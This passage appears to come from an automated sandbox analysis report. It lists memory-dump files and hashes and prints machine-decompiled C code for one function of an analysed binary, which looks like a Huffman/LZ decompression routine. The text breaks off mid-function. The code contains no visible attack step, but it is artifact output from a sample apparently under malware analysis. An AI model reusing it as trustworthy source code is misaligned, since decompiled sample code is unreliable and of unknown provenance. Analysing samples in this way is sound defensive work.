Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
Instruction ID: 60b6c36c7d67bbb22c6799511e508068e08bc61f0038def6c2184cd2979d74c5
Opcode Fuzzy Hash: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
Instruction Fuzzy Hash: B0622831624B958FCB25CF38C8946B9FBE1AF95304F04C96ED8AE8B346D770A955CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00276CDB, Relevance: .8, Instructions: 773
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00276CDB(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E0026A4ED(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E0026A4ED(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E0026A4ED(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E0027EA80(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E0027EA80(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E00273564(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E00271A0E(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E0026A4ED(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E0026A4ED(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E0027EA80(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E00277D76(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E00277D76(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E0026A4ED(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E002747DA(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
